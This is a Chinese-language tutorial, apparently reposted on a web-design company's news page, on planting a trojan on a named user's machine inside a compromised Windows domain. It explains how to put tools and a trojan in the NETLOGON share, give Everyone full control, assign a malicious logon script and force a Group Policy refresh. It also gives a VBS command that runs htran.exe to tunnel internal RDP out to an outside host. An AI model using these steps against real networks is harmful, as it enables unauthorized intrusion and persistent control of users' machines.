网站建设行业文章4
当前位置: 首页 -> 企业资讯 -> 行业文章 -> 域内指定用户种马
鸿大千秋新闻顶部侧栏



域内指定用户种马



在我们渗透工作中,只要能入侵windows域中任意一台主机,就能通过一些猥琐技巧拿到域服务器管理员权限。但是有时要入侵一些域内用户终端,有 时我们只知道目标的用户名,但是无法判断他在哪台机器上面登录,若是通过bginfo记录登录事件的话,那也要需要很长时间,但还不一定我们的域控制器就 可以控制他,所以我们就可以利用用户登录脚本实现让这台机器中马。这样解决了用户可以访问域但是域控制器不可以管理用户登录机器的情况。

这里我说明一点,当域用户在本机属于power users组以下权限时,是无法运行exe的,我们根本无法判断用户在登录机器上的权限,所以我们只有认为用户是非系统管理员权限,利用lsrunas.exe工具来提取权限。

我们打开域的netlogon共享

将我们需要使用的工具和木马(最好是系统权限的)放到该目录,修改文件权限everyone完全控制权限。然后我们配置域用户登录脚本。

最后使用gpupdate /force强制刷新组策略,至此,所有配置已经完成,但是有的域用户登录两次才可以上线,这里不是我们所决定的。

注意:使用vbs脚本编写命令时需要注意,需要在objshell.Run””添加命令时如果想要使用双引号,一定要把命令使用双引号双层嵌套如

Objshell.run”cmd.exe /c “”htran.exe –p –slave 1.2.3.4 80 192.168.1.1 3389”””本来我们的cmd.exe /c 后面之需要一层双引号,但是我们为了让vbs语句正常使用,必须要再使用一次。

91ri.org注:最后一定要使用gpupdate /force强制刷新组策略,假如没有强制刷新是不能生效的!
本文摘自Chinadu博客由网络安全攻防研究室(www.91ri.org) 信息安全小组收集整理.转载本文请著名原文地址及原作者版权信息。



鸿大千秋网站建设团队敬上







Copyright © hongdaChiaki. All Rights Reserved. 鸿大千秋 版权所有


联系方式:
地址: 深圳市南山区招商街道沿山社区沿山路43号创业壹号大楼A栋107室
邮箱:service@hongdaqianqiu.com
备案号:粤ICP备15078875号